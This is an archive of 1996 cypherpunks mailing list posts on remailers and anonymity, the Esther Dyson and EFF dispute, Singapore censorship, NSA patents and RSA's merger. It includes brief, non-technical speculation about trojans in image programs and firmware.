2. The method of claim 1 further comprising the step of plating said magnetic probe and said magnetically recorded media with at least three-hundred angstroms of gold in order to reduce spurious probe deflection due to surface oxides on either said magnetic probe or said magnetically recorded media.

3. The method of claim 1 wherein said step of replacing the fine metallic tip of a scanning tunneling microscope with a flexible thin-film magnetic probe is accomplished by replacing the fine metallic tip of said scanning tunneling microscope with a thin-film nickel probe.

4. The method of claim 1 wherein said step of replacing the fine metallic tip of a scanning tunneling microscope with a flexible thin-film magnetic probe is accomplished by replacing the fine metallic tip of said scanning tunneling microscope with a thin-film iron probe.

5. A method of measuring magnetic fields on magnetically recorded media comprising the steps of:
   (a) replacing the fine metallic tip of a scanning tunneling microscope with a flexible thin-film magnetic probe in order to relate probe position to magnetic field strength;
   (b) removing any protective layer from said magnetically recorded media so that said protective layer does not impede the establishment of a tunneling current between said magnetic probe and said magnetically recorded media;
   (c) aligning said magnetic probe with a recorded track of said magnetically recorded media at an angle of zero degrees;
   (d) positioning the tip of said magnetic probe to said magnetically recorded media at an angle in the range of zero degrees to pi/2 degrees in order to establish said tunneling current;
   (e) scanning said recorded track of said magnetically recorded media with said magnetic probe a first time;
   (f) recording changes in position of said magnetic probe during said scanning of step (e) due to changes in the magnetic field of said magnetically recorded media;
   (g) positioning the tip of said magnetic probe to said magnetically recorded media at an angle in the range of zero degrees to pi/2 degrees but at an angle that is different than the angle used in step (d) in order to establish said tunneling current;
   (h) scanning said recorded track of said magnetically recorded media with said magnetic probe a second time;
   (i) recording changes in position of said magnetic probe during said scanning of step (h) due to changes in the magnetic field of said magnetically recorded media;
   (j) positioning the tip of said magnetic probe to said magnetically recorded media at an angle in the range of zero degrees to pi/2 degrees but at an angle that is different than the angles used in step (d) and step (g) in order to establish said tunneling current;
   (k) scanning said recorded track of said magnetically recorded media with said magnetic probe a third time;
   (l) recording changes in position of said magnetic probe during said scanning of step (k) due to changes in the magnetic field of said magnetically recorded media;
   (m) combining the resulting three recordings of step (f), step (i), and step (l) linearly in order to obtain a single record of the position changes of said magnetic probe due to changes in the magnetic field of said magnetically recorded media; and
   (n) computing the magnetic fields associated with said combination of step (m) by using a mathematical equation that relates the position of said magnetic probe to the strength of the magnetic field.

6. The method of claim 5 further comprising the step of plating said magnetic probe and said magnetically recorded media with at least three-hundred angstroms of gold in order to reduce spurious probe deflection due to surface oxides on either said magnetic probe or said magnetically recorded media.

7. The method of claim 5 wherein said step of replacing the fine metallic tip of a scanning tunneling microscope with a flexible thin-film magnetic probe is accomplished by replacing the fine metallic tip of said scanning tunneling microscope with a thin-film nickel probe.

8. The method of claim 5 wherein said step of replacing the fine metallic tip of a scanning tunneling microscope with a flexible thin-film magnetic probe is accomplished by replacing the fine metallic tip of said scanning tunneling microscope with a thin-film iron probe.

************************************************************************
* Bruce Schneier              2,000,000,000,000,000,000,000,000,002,000,
* Counterpane Systems         000,000,000,000,000,000,002,000,000,002,293
* schneier at counterpane.com The last prime number...alphabetically!
* (612) 823-1098              Two vigintillion, two undecillion, two
* 101 E Minnehaha Pkwy        trillion, two thousand, two hundred and
* Minneapolis, MN 55419       ninety three.
************************************************************************

From craiu at pcnet.pcnet.ro Tue Sep 3 04:31:12 1996
From: craiu at pcnet.pcnet.ro (Costin RAIU)
Date: Tue, 3 Sep 1996 19:31:12 +0800
Subject: Message Digest
Message-ID: <01BB9989.81517870@dial15.pcnet.ro>

Hi, cypherpunks

I'm interested in a 256 bits (or more) message digest algorithm (C source is better). Any URLs ?

bye, c0s

*-----------------------------------------------------------------------------*
| Costin RAIU, D.S.E. (craiu at pcnet.pcnet.ro)                               |
| UNIX++C, RAYTRACING, RAVE, anime and SF(ST) fan                             |
|                                                                             |
| "Windows95 - Tomorrow's bugs, Today"                                        |
*-----------------------------------------------------------------------------*

From jf_avon at citenet.net Tue Sep 3 04:42:45 1996
From: jf_avon at citenet.net (Jean-Francois Avon)
Date: Tue, 3 Sep 1996 19:42:45 +0800
Subject: DON'T Nuke Singapore Back into the Stone Age
Message-ID: <9609030809.AB20606@cti02.citenet.net>

On 2 Sep 96 at 11:46, Enzo Michelangeli wrote:

> On Sun, 1 Sep 1996 ichudov at algebra.com wrote:
> > James Seng wrote:
> > > To understand the situation better, you should not impose America
> > > ideology and perspection on how things to be done to Singapore.
> > > Singapore maybe young but there are certain culture too.

I agree with that. I should therefore cease, as much as possible, to interact with them by stopping to buy anything made in Singapore. Then, let them starve, fed by their higher cultural ideas.

> > > Most importantly, the move to censor certain WWW site actually
> > > comes as a relief to many people, especially parents who
> > > worried about the bad influence of it. We can go into the same
> > > discussion about whose responsibility it is but before you do
> > > that, please bear in mind that this is Singapore.

At whose moral expense?

> Of course, one may argue that the racial, social and religious
> relations are better handled the American way. That, however, is a
> controversial issue, and adopting confrontational cowboy attitudes
> is not going to make the social evolution any faster.

Who talks of social evolution? We only talk about civil liberties. And they are damn easy to implement: Leave your neighbor do what he pleases. Mind your own business.

> IMHO, the present measures represent more a gesture of appeasement
> to concerned social conservatives, not differently from the CDA in
> the US, than an attempt to control the flow of information.

This whole paragraph is a fine example of appeasement. And the CDA *is* an attempt to control the flow, not of information, but of ideas.

jfa

DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
JFA Technologies, R&D consultants: physicists, technologists and engineers.
PGP keys at: http://w3.citenet.net/users/jf_avon
ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891

From stewarts at ix.netcom.com Tue Sep 3 05:52:55 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 3 Sep 1996 20:52:55 +0800
Subject: What is the EFF doing exactly?
Message-ID: <199609030930.CAA21885@toad.com>

At 03:54 PM 9/2/96 -0700, someone purporting to be "Vladimir Z. Nuri" wrote:
[EFF / Unicorn rant, deleted. ]
>I also don't understand the anonymity fight by cpunks. it's the
>wrong battle imho. ask any remailer operators how their services
>are panning out. they will complain of the incessant spam and
>increasing litigious pressure. I don't see any technological
>solutions to these problems. if there were, they'd have been
>invented now.

As a former remailer operator who quit because of spam, and may restart when I can hack together a spam-reducing remailer, let me comment on this. We're only beginning to understand the technical questions for the parts of the problem that technology can do.
One problem is that the technical definition of spam is "I'll know it when I see it", which is hard to write code for. And the definition of "offensive" is "one or more letters together, viewed by the appropriate reader", and remailers are good at finding that sort of reader. A lot of it is social, not technical. But improving blocking capabilities and news-cancel capabilities helps.

And some problems are just _hard_ technically. Take 2-way remailers - encrypted reply blocks aren't perfect, because the system that handles them can decrypt them. Nymservers that depend on a different system supporting encrypted reply blocks help, because it forces Bad Guys to subvert two systems to identify the recipient, and you can chain that sort of thing to make it harder. But it's still tough, and that problem is fairly well-defined. Getting rid of vaguely-defined things is tougher.

Mike Godwin has suggested that some of the major problems on the net are the results of "cheap speech". It's easy to send insults and hate email to people, nearly anonymously, nearly free, when only a few hostile people would bother doing it with paper mail, and most newspapers wouldn't print it. The News Media Establishment is threatened because anybody can broadcast anything they want to millions of people without spending millions of dollars for an artificially scarce TV channel that requires government permission to broadcast on. Readers are swamped because 25 million Internet users sending one line of text per day make 2 GB of Usenet/Web/Email, which is three or four orders of magnitude beyond what most people can actually read. Scale is tough, and problems that are half-solvable at one scale may be insolvable at the next order of magnitude.

Anonymous remailers support several things I want to do, and that I want other people be able to do:
1) Let people have private conversations without being identified by third parties.
2) Let people have private conversations without being identified by each other, voluntarily and respecting each others' rights.
3) Let people broadcast things to the public that they might be afraid to do otherwise.
4) Let people broadcast things to the public without their reputations, good or bad, affecting readers' reactions.
5) Let people experiment with different personality and conversation styles, though this doesn't strictly require anonymity.
6) Let people communicate with government officials without risk.

Not all of these things are always good; people can abuse them if they want, and one reason for experimenting with different kinds of remailers is to try to balance the good and bad that comes from facilitating those conversations. Technical capabilities of the remailer will affect how people use it; two-way-ness is a big win. I blocked president at whitehouse.gov on my remailer real early, though that's mainly because the government has this silly law against threatening the President.

>let's face it, anonymity is a pain in the ass to support.
>maybe there are other goals that are more crucial
>that lie at the heart of anonymity. what cpunks are really
>seeking is "assurance of freedom from retribution". when the
>problem is phrased more openly like that, other solutions become
>possible and worth consideration.

An interesting formulation. While there are more issues than just preventing retribution, theft, and prejudice, that would be a good start. Unfortunately, the two approaches I can see to achieving it are
1) Have a perfect world with perfect people in it and perfect people running human-rights-respecting governments
2) Don't let them know your name.

While there are groups that are working on bringing us closer to 1), or at least as far as "1a) Have a semi-tolerable world where the government doesn't harass you very much for what you say and doesn't single you out as a source of funds for their great plans", those folks have a long row to hoe. We can do something about 2). I'm happy to work on 1a) with people, though I won't see it in my lifetime, but you and I can work on 2) today, and accomplish something.

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From hvdl at sequent.com Tue Sep 3 06:08:34 1996
From: hvdl at sequent.com (Hans Unicorn Van de Looy)
Date: Tue, 3 Sep 1996 21:08:34 +0800
Subject: Passive Trojan (was:Re: HAZ-MAT virus)
In-Reply-To:
Message-ID: <9609030938.AA07849@amsqnt.nl.sequent.com>

::
Request-Remailing-To: remailer at huge.cajones.com

##
Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus)
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

::
Request-Remailing-To: remailer at remailer.nl.com

##
Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus)
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

::
Request-Remailing-To: furballs at netcom.com (Paul S. Penrod)

##
Subject: Re: Passive Trojan (was:Re: HAZ-MAT virus)
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

The one-and-only Paul S. Penrod once stated:
!
! This has been done in the past using several variants (but not in a image
! program).
!
! The key to the success is that the application in question has to be
! compromised to respond to these codes, either by design or by hacking.
! Either way the individual responsible must modify the execution
! mechanism, not just the data itself.
!
! Let's see -current examples of computing items with this kind of a
! "feature"... magic cookies, macros, OLE, DDE, MS Objects, JAVA, and the
! list keeps growing.

And not to forget the future of virii. Modification of the BIOS of parts of the PC platform (motherboard, SCSI interfaces), or the firmware of drives.
Since these building blocks are more and more equipped with flash-like PROMS which can be reprogrammed, they become a valid target for these kinds of programs. ! On Mon, 2 Sep 1996, Jason Wong wrote: ! ! > ! > Actually , THINK about it, it does makes a interesting idea for a trojan ! > horse doesn't it ? I mean, just get a solid graphic program, insert codes ! > into it so that when certain conditions, i.e. a particular gif or jpg file ! > is view, print, etc, the trojan activates !! ! > ___________________________________________________________________________ ! > ! > Jason Wong (CNE, MCP) Jason at MCSB.COM.SG ! > Network Engineer ! > MCSB Systems Pte Ltd ! > ___________________________________________________________________________ Deep Throat. From stewarts at ix.netcom.com Tue Sep 3 08:35:34 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Tue, 3 Sep 1996 23:35:34 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi Message-ID: <199609030830.BAA20001@toad.com> At 08:39 PM 9/2/96 -0800, Jim Bell (who else:-) wrote: >At the risk of sounding like a broken record (a phrase that will get ever >more obscure now that we're in the CD era...) that's why I pushing AP >(Assassination Politics.) In case anybody wonders why there _are_ relatively reasonable people like Esther Dyson who aren't happy with anonymity in spite of not liking the alternative of government control, this sort of thing _is_ one of the reasons :-) You CAN freak ALL the mundanes all the time, but it's not necessarily a good idea..... # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From jonl at well.com Tue Sep 3 08:45:48 1996 From: jonl at well.com (Jon Lebkowsky) Date: Tue, 3 Sep 1996 23:45:48 +0800 Subject: What is the EFF doing exactly? 
Message-ID: <2.2.32.19960903115249.006e7bfc@mail.well.com> At 07:40 PM 9/2/96 -0400, Black Unicorn wrote: >> what *constructive* >> alternative to EFF do you propose? if you have none, please shut up. > >I think any organization that would apply political pressure rather than >bow to it would be an alternative. I think an organization in touch >enough with its own policy to prevent its staff and board from making >embarassing big brother type proposals to curtail the ability of any of us >to post without attributation would be an alternative. I think an >organization without the internal conflict and strife that has clearly >marred EFF in past and made it a laughable attempt at cohesive political >persuasion would be an alternative. I think an organization that had >official policies on the core issues which it proposes to influence would >be an alternative. > >In short, an organization that had even one of the needed elements of >legislative influence. (Cohesive, directed, persistent, and >uncompromising). "Uncompromising" is not an "element of legislative influence," at least not on this planet. -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From haystack at cow.net Tue Sep 3 09:05:00 1996 From: haystack at cow.net (Bovine Remailer) Date: Wed, 4 Sep 1996 00:05:00 +0800 Subject: Voting Monarchist? Message-ID: <9609031057.AA17091@cow.net> unicorn at schloss.li wrote: >I hate lightning it's pretty, but it can be nasty. most pretty things can. > Vote Monarchist who is the candidate? LaRouche? 
From jonl at well.com Tue Sep 3 09:41:36 1996 From: jonl at well.com (Jon Lebkowsky) Date: Wed, 4 Sep 1996 00:41:36 +0800 Subject: POT_hot Message-ID: <2.2.32.19960903115927.006b2548@mail.well.com> At 11:50 PM 9/2/96 -0800, jim bell wrote: >At 11:39 PM 9/2/96 GMT, John Young wrote: >> Foreign Affairs, Sep/Oct, Lead Essay: >> >> "Postmodern Terrorism. The terrorism of the future may be >> far more destructive than terrorism as we have known it." >> >> An informative survey and pot-heat by Walter Laqueur. >> >> Terrorism's prospects, often overrated by the media, >> the public, and some politicians, are improving as its >> destructive potential increases. Terrorism has >> replaced wars between nations of the 1800s and 1900s. >[deleted] >> Why assassinate a politician or indiscriminately kill >> people when an attack on electronic switching will >> produce far more dramatic and lasting results? If the >> new terrorism directs its energies toward information >> warfare, its destructive power will be exponentially >> greater than any it wielded in the past -- greater >> even than it would be with biological and chemical >> weapons. The single successful one could claim many >> more victims, do more material damage, and unleash far >> greater panic than anything the world has yet >> experienced. >> http://jya.com/pothot.txt (30 kb) > > > >Am I being unreasonable to expect at least a certain degreee of logic in the >world? Why is it that this guy (Laqueur) seems to believe that the future >is filled with "greater panic than anything the world has yet experienced." >I believe that, while there may be panic, it'll be panic on the part of the >politicians, not ordinary citizens. I suppose a certain amount of bias is >to be expected, seeing as how it's Foreign Affairs magazine. 
A good representation of postmodern paranoia...the ingredients: a mind somewhat boggled by the extent of change (and the extent of awareness of change) occasioned by the 'information revolution,' a growing awareness of the fragile interdependence of control systems, and (this is the clincher) an inability to trust the intentions of the vast conspiratorial World Outside. -- Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl Electronic Frontiers Forum, 6PM PDT Thursdays "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky From peter.allan at aeat.co.uk Tue Sep 3 10:22:45 1996 From: peter.allan at aeat.co.uk (Peter M Allan) Date: Wed, 4 Sep 1996 01:22:45 +0800 Subject: SNAKEOIL? Top Secret for Windows Message-ID: <9609031259.AA24982@clare.risley.aeat.co.uk> DJ> From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) DJ> Subject: SNAKEOIL? Top Secret for Windows DJ> http://www.simtel.net/pub/simtelnet/win3/security/tsecret.zip DJ> ftp://ftp.simtel.net/pub/simtelnet/win3/security/tsecret.zip 12070 bytes DJ> tsecret.zip TOPSECRET!: Easily encrypts any file DJ> TOPSECRET is a program to encrypt your sensitive files. ............ DJ> Shareware. Uploaded by the author. DJ> Siva Krishna DJ> sk510019 at mail.idt.net PA> I'm interested in reading the source PA> code and any more detailed description you have. SK> I am currently not releasing the source code.Here is a copy of the zip SK> file if you get hold of a pc. -- Peter Allan peter.allan at aeat.co.uk From hvdl at sequent.com Tue Sep 3 10:26:13 1996 From: hvdl at sequent.com (Hans Unicorn Van de Looy) Date: Wed, 4 Sep 1996 01:26:13 +0800 Subject: Passive Trojan (was:Re: HAZ-MAT virus) In-Reply-To: <9609030938.AA07849@amsqnt.nl.sequent.com> Message-ID: <9609031310.AA11046@amsqnt.nl.sequent.com> A non-text attachment was scrubbed... 
Name: not available Type: application/pgp Size: 14 bytes Desc: not available URL: From froomkin at law.miami.edu Tue Sep 3 10:51:45 1996 From: froomkin at law.miami.edu (Michael Froomkin) Date: Wed, 4 Sep 1996 01:51:45 +0800 Subject: Los Angeles Times article on Helsingius and anon.penet.fi (fwd) Message-ID: Mike Godwin on E.Dyson: [please note that I'm just a conduit here; direct replies accordingly] ---------- Forwarded message ---------- Date: Tue, 3 Sep 1996 02:17:12 -0700 >From: Mike Godwin To: Michael Froomkin , Mike Godwin Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi (fwd) Esther had written: >Now, speaking personally: I believe there are trade-offs -- which is what I >told the LA Times. I assume I was quoted accurately (although the word >"enforce" is awkward), but out of context. Anonymity can be dangerous -- >as can traceability, especially in/by repressive regimes. Therefore I would >favor allowing anonymity -- with some form of traceability only under terms >considerably stronger than what are generally required for a wiretap. >Anyone who seriously needs anonymity because of a repressive government is >likely to use a foreign (outside whatever jurisdiction he fears) server, so >that this is not a matter of "local" laws. The tracer would have to pass >through what I hope would be tighter hoops than we have now. This is surely a reasonable statement for Esther to have made, even though connotatively it may seem to have an anti-anonymity thrust to it. Who can dispute that individual freedom (of any sort) entails the potential that someone will use that freedom badly, and that the greater the freedom the greater the theoretical potential for harm? The civil-libertarian argument can't be any naive denial of this sort of analysis -- instead, it has to something that acknowledges the truth of the principle, yet simultaneously denies the inference that the principle, standing alone, amounts to a case for limiting that freedom. 
One way to do so is to argue that the theoretical threat is outweighed by the benefits both to society and to individuals. Another is to point out that there seems to be no evidence that the theoretical problem has transmuted itself into a real one. You may feel free to forward this. --Mike ------------------------------------------------------------------------------- Law Professor Volokh Errs In Slate Article About Communications Decency Act. Set your browser to the following URL to read a critique of the Slate article by EFF's Mike Godwin and MIT's Hal Abelson: . Mike Godwin, EFF Staff Counsel, can be reached at mnemonic at eff.org or at his office, 510-548-3290. --------------------------------------------------------------------------- From proff at suburbia.net Tue Sep 3 11:13:22 1996 From: proff at suburbia.net (Julian Assange) Date: Wed, 4 Sep 1996 02:13:22 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <2.2.32.19960903115249.006e7bfc@mail.well.com> Message-ID: <199609031324.XAA30461@suburbia.net> > At 07:40 PM 9/2/96 -0400, Black Unicorn wrote: > >> what *constructive* > >> alternative to EFF do you propose? if you have none, please shut up. > > > >I think any organization that would apply political pressure rather than > >bow to it would be an alternative. I think an organization in touch > >enough with its own policy to prevent its staff and board from making > >embarassing big brother type proposals to curtail the ability of any of us > >to post without attributation would be an alternative. I think an > >organization without the internal conflict and strife that has clearly > >marred EFF in past and made it a laughable attempt at cohesive political > >persuasion would be an alternative. I think an organization that had > >official policies on the core issues which it proposes to influence would > >be an alternative. > > > >In short, an organization that had even one of the needed elements of > >legislative influence. 
(Cohesive, directed, persistent, and > >uncompromising). Certain members of the EFF board seem to be politically naive. The rational, intelligent lobbyist will always see both sides of the argument. Presenting both sides of the argument to the world at large is another matter altogether. You should only present both sides of the argument to the inner policy tactics personnel only in order to formulate policy and create defences for the weaknesses in your position. To the outside world only ever sees a united front. This is basic politics. The EFF is most certainly not the only speaker on the floor where this issue is concerned. There are some very powerful government interests who oppose anonymity in any form. For the EFF, who is viewed as normally opposing government regulation, to have it's spokes-person start shooting off her mouth and the EFF's previous position down publically before they even go into battle is political suicide. The claim of `I was just presenting my personal opinion on the matter' doesn't hold water. Dyson represents a political lobby group and has no "personal opinion" when talking publically about issues that concern the organisation she has been elected to represent. In the interview material I have seen Dyson talks about the EFF in the same context as the anonymity issue, and the reader understandably gains the impression that she is speaking on the behalf of the EFF, and I'm sure at the time Dyson and the interviewer thought she was too. Compromise is part of the legislative process, but it is something you do behind closed doors when the battle is concluded and each faction is counting the dead and starting to divide up territory. If you start the battle in a compromised position, expect to loose everything. Dyson, given her age and experience should be well aware of this, which is why I find her remarks unusual. -- "Of all tyrannies a tyranny sincerely exercised for the good of its victims may be the most oppressive. 
It may be better to live under robber barons than under omnipotent moral busybodies, The robber baron's cruelty may sometimes sleep, his cupidity may at some point be satiated; but those who torment us for own good will torment us without end, for they do so with the approval of their own conscience." - C.S. Lewis, _God in the Dock_

+---------------------+--------------------+----------------------------------+
|Julian Assange RSO | PO Box 2031 BARKER | Secret Analytic Guy Union |
|proff at suburbia.net | VIC 3122 AUSTRALIA | finger for PGP key hash ID = |
|proff at gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+

From julf at penet.fi Tue Sep 3 12:16:41 1996
From: julf at penet.fi (Johan Helsingius)
Date: Wed, 4 Sep 1996 03:16:41 +0800
Subject: Educating former anon.penet.fi users about other remailers
Message-ID: <1.5.4.32.19960903141834.0084bc34@pentu.penet.fi>

>If somebody were to put together a one-page note on other remailers,
>would it make sense to send it to all the penet.fi users?
>A canonical cypherpunks approach would be to just write one and
>send it to na000001 at anon.penet.fi ..... na600000 at anon.penet.fi,
>but I assume either my system or Julf's would decide it was spam
>and discard it (even if it were split up into 60,000 10-message chunks.)

Yes, that's what would happen. And I fear what would happen, load-wise, if I tried to send 700.000 messages. Might be a good idea to post it into the appropriate newsgroups, at least.

Julf

From preese at erinet.com Tue Sep 3 12:35:18 1996
From: preese at erinet.com (Paul Reese)
Date: Wed, 4 Sep 1996 03:35:18 +0800
Subject: hackerlist
Message-ID: <2.2.32.19960903111744.8c66f01c@erinet.com>

At 08:51 AM 9/1/96 EDT, you wrote:

Get a clue! Why on earth would you want a list like this and why on earth would anyone want to place themselves on such a list? Dumb idea!
Proves the kind of clientel that Juno opens the doorways of Internet E-mail to.... >I am planning to make a list of hackers and would appreciatte it if you >would e-mail me with the following information. >handle >e-mail >city,state >url >whether or not you would like to recieve the list when finished > thanks for your help > P. Cummings > Patrickbc at juno.com > > Reply-To: preese at erinet.com From smith at sctc.com Tue Sep 3 12:52:17 1996 From: smith at sctc.com (Rick Smith) Date: Wed, 4 Sep 1996 03:52:17 +0800 Subject: Moscowchannel.com hack Message-ID: <199609031548.KAA04410@shade.sctc.com> : On Sat, 31 Aug 1996, Joel McNamara wrote: : > Just a matter of time before some builds a dedicated Satan type tool that : > scans for HTTP server holes or messed up file permissions to make locating : > potential victims easy. Snow replied: : Write your web site to a CD-ROM and hard-code the base directory into the : webserver. Or host it on something with mandatory access control protections. There are still a handful of us building such things, and they can give really good protection to web page contents. Rick. smith at sctc.com secure computing corporation From jamesd at echeque.com Tue Sep 3 13:45:14 1996 From: jamesd at echeque.com (James A. Donald) Date: Wed, 4 Sep 1996 04:45:14 +0800 Subject: The Esther Dyson Flap Message-ID: <199609031617.JAA01391@dns1.noc.best.net> At 08:11 PM 9/2/96 -0700, Timothy C. May wrote: > Esther Dyson says that anonymity on the Net can do more damage than > anonymity in other forums, and thus may need to be regulated and restricted > in various ways. > > [...] > > This is the "knife edge," or "fork in the road," I've long talked about. If > anonymity is outlawed, it will take draconian measures to enforce > it--citizen-unit ID cards, officially issued encryption keys, escrow, > monitoring of communications, massive penalties to deter illegal use of > encryption, and other police state measures. 
Esther Dyson has gone over to the enemy, she is chairman of the EFF, therefore the EFF has gone over to the enemy. > I don't call her our enemy. Perhaps she just hasn't thought things through > as deeply as many of us have. This seems unlikely. After all, it is her job. The net makes free speech more effective. Therefore the world must become more free, or else must suppress free speech, and thus become less free. Which side are you on? It is that simple. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Tue Sep 3 13:48:11 1996 From: jamesd at echeque.com (James A. Donald) Date: Wed, 4 Sep 1996 04:48:11 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609031557.IAA28466@dns1.noc.best.net> At 06:52 AM 9/3/96 -0500, Jon Lebkowsky wrote: > "Uncompromising" is not an "element of legislative influence," at least not > on this planet. Dead wrong: The pols always say "We would like your help in writing legislation, but if you want to contribute to the legislation you must accept reasonable compromise". But we do not want legislation, so we do not want to help write legislation. We want to delay legislation for as long as possible, for the longer the delay, the more the balance of power favors the net and disavors the pols. Therefore the correct strategy is simply to attack any politician who shows any interest in legislating on our issues. We have no friends on Capitol hill, and if we did have friends, it would still be necessary to denounce them as enemies. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. 
True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From nobody at huge.cajones.com Tue Sep 3 14:01:34 1996 From: nobody at huge.cajones.com (Huge Cajones Remailer) Date: Wed, 4 Sep 1996 05:01:34 +0800 Subject: Free Speech and List Topics Message-ID: <199609031644.JAA08677@fat.doobie.com> qut at netcom.com (Dave Harman OBC) penned: >! At 5:17 AM 9/2/96, qut wrote: >No doubt the media is colluding for criminal purposes and >shady outfits like The New York Times should be seized and analysed >by Department Of Justice anti-trust invesigators. I never thought I'd say this, so I'm saying it through a remailer :) but please, skippy, don't vote Libertarian! From tcmay at got.net Tue Sep 3 14:15:52 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 4 Sep 1996 05:15:52 +0800 Subject: Passive Trojan (was:Re: HAZ-MAT virus) Message-ID: At 9:38 AM 9/3/96, Hans "Unicorn" Van de Looy, aka "Deep Throat," wrote: >:: >Request-Remailing-To: remailer at huge.cajones.com .... >:: >Request-Remailing-To: remailer at remailer.nl.com .... >:: >Request-Remailing-To: furballs at netcom.com (Paul S. Penrod) > >Deep Throat. Hey, Hans, ya gotta watch those "Cc: cypherpunks at toad.com" lines! At least now we know who the _other_ "Unicorn" is. How's Sequent doing? Is Casey Powell still there? --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." 
From declan at well.com Tue Sep 3 14:17:46 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 4 Sep 1996 05:17:46 +0800 Subject: Flux in today's HotWired/Packet Message-ID: http://www.packet.com/flux/ The recently concluded merger of Security Dynamics Technologies Inc. with RSA Data Security Inc. may have offered us one of our last opportunities for insight into the bizarre and byzantine business world of commercial cryptography in America today. And one of the chief insights we've gleaned from Security Dynamics' filings with the Securities and Exchange Commission about the merger is that the company may have bought not only a lemon, but a lemon that, when swallowed, could make Security Dynamics double over with food poisoning. Why did Security Dynamics pay nearly US$300 million for RSA, a company which had less than $1 million in profit last year on revenue of some $11 million? Furthermore, its encryption patents will expire in four years, which means that all RSA really owns is its relationships with customers such as Netscape and Hewlett-Packard. Even worse, those patents are under attack at the moment through a lawsuit filed against RSA by Cylink Corporation, an RSA competitor holding similar patents that was a one-time partner in a failed joint venture with RSA. Another lawsuit pending against RSA, Security Dynamics, and Cylink was brought by Roger Schlafly, a cryptographic researcher who is attempting to invalidate any and all patents that might attempt to monopolize public key cryptography. Indeed, in a worst case scenario, what Security Dynamics may have purchased is a huge summary judgment (against itself) should Cylink actually prevail in its suits. 
According to Security Dynamics' recent S-4 filing with the SEC, "RSA has been advised that, in a letter to SDI following the announcement of the proposed merger, Cylink's general counsel asserted that Cylink's compensatory damages, conservatively estimated, would exceed $75,000,000 but provided no basis for such estimate." That's the kind of negative return on investment from an acquisition that we've come to expect from America Online (remember BookLink and WAIS Inc.?)! From pstira at escape.com Tue Sep 3 14:18:55 1996 From: pstira at escape.com (pstira at escape.com) Date: Wed, 4 Sep 1996 05:18:55 +0800 Subject: What the NSA is patenting... In-Reply-To: Message-ID: On Tue, 3 Sep 1996, Bruce Schneier wrote: > I just spent a pleasant hour or so searching a patent database for all > patents assigned to the NSA. There's some interesting stuff: > > "Self-locking, tamper-evident package" > Method of retrieving documents that concern the same topic" > Oh Bruce, Bruce, Bruce, Say it ain't so -- the NSA is trying to patent the GUMMED ENVELOPE ???! *NOW* I have truly seen everything. -Millie. From tcmay at got.net Tue Sep 3 14:23:17 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 4 Sep 1996 05:23:17 +0800 Subject: The Esther Dyson Flap Message-ID: At 1:40 PM 9/3/96, Chuck Thompson wrote: >"as a citizen" You seem to be qualifying your statement. Do you mean that >she should have her right to free speech taken or stifled as chairwoman? At No. I said nothing of the kind. When people speak of "don't you believe in her right to free speech?," I try to point out that this such a "right of free speech" is not the issue at hand. >the very least, it appears that several are demanding that she espouse a >particular point of view because she is the chairwoman of an organization >which, on the whole, is assumed to have a different viewpoint. It seems to No, I said nothing like this. She is obviously free to speak anything she wishes, as a citizen or as head of an organization. 
It is up to members (actually: _Board_ members, as EFF is not a grassroots, member-voting organization) to decide if her support for restricting anonymous speech is consistent with EFF directions. However, as I said, if the top spokesman at EFF gives indication of having views pretty much 180 degrees out of phase with our views, it's likely we'll speak up and oppose her (or him), and perhaps even suggest that other EFF board members look into the matter. "Free speech" is not even an issue. >>Well, many of us did not pounce. Speaking for myself, I strongly suspected >>that the newspaper article had summarized a more-nuanced point and had >>effectively taken just a convenient sound bite. > >And you are to be commended for not doing so. In fact, your response to my >message is exactly what I would expect.. a well-put statement of a contrary >opinion. Thanks. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps 